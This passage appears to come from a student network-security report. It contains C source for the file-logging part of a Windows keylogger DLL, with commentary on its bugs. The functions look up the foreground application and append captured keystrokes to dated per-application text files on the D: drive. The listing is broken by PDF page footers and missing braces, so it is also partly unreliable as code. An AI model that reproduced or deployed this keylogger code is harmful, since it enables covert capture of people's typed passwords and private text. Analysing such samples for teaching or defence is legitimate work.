// WriteStringToFile to build the per-application log file name.
//
// Ownership is inconsistent: on success the result is a malloc'd 1000-byte
// buffer that the caller never frees (about 1 KB leaks in the hooking
// process per logged key), while on OpenProcess failure a string literal ""
// is returned instead and the malloc'd buffer leaks. If GetModuleBaseName
// fails the buffer is returned with uninitialised contents.
//
// The body is interrupted by a PDF page break (marked below) and one closing
// brace is missing from the listing (extraction artifact).
char* GetExecutor( DWORD processID )
{
HMODULE hMods[1024];
HANDLE hProcess;
DWORD cbNeeded;
unsigned int i;
char* result = (char*)malloc( 1000 );;
// Get a handle to the process.
hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, processID );
if (NULL == hProcess)
return "";
// Get a list of all the modules in this process.
if( EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded))
{
for ( i = 0; i < (cbNeeded / sizeof(HMODULE)); i++ )
{
TCHAR szModName[MAX_PATH];
// Get the base name (not the full path) of the module's file.
if ( GetModuleBaseName( hProcess, hMods[i], szModName,
sizeof(szModName) / sizeof(TCHAR)))
{
TCHAR* prcName = szModName;  // unused
// Narrow the wide name into the result buffer; wcstombs on a TCHAR
// array presupposes a UNICODE build (TCHAR == wchar_t).
wcstombs( result, szModName, 1000 );
}
// Unconditional break: only hMods[0], the process's main executable, is examined.
break;
}

// --- the next three lines are the PDF's running page footer/header, not source ---
SVTH: Sn Anh Hi ng Minh Hi 08T4


24

Bo Co An Ton Thng Tin Mng


// Release the handle to the process.
CloseHandle( hProcess );
return result;
}
// Appends txt to today's log for the application that owns the foreground
// window. The file name is hard-coded to
// "d:\key-<year>_<month>_<day>-<exe name>.txt" (D: drive, no zero padding);
// these paths are the sample's on-disk artifact.
//
// Every call opens the file in append mode, writes, and closes it again, so
// there is one open/close pair per logged key. fopen's result is not checked,
// so if D: is absent or not writable fprintf receives NULL. str is 100 bytes
// while the executable name from GetExecutor is not bounded here, so a long
// process name overruns it; the malloc'd name GetExecutor returns is never
// freed. The function's closing brace is missing from the listing
// (extraction artifact).
void WriteStringToFile(char* txt)
{
// File name by Time and App
// Current time (local time, not UTC)
SYSTEMTIME st;
GetLocalTime(&st);
// Current App
HWND curhwndWindow = GetForegroundWindow(); // get the handle of the window currently in use
DWORD processID;
GetWindowThreadProcessId(curhwndWindow, &processID);
char str[100];
sprintf(str,"d:\\key-%d_%d_%d-%s.txt",st.wYear,st.wMonth,st.wDay,
GetExecutor(processID));

out=fopen(str,"a");
fprintf(out,"%s",txt);
fclose(out);

// DLL entry point. Nothing is done on attach/detach: every case falls through
// to the break, and the call always succeeds. In particular no cleanup of the
// shared `out` stream or the hook handle happens on DLL_PROCESS_DETACH.
BOOL APIENTRY DllMain( HMODULE hModule,


DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

SVTH: Sn Anh Hi ng Minh Hi 08T4


25
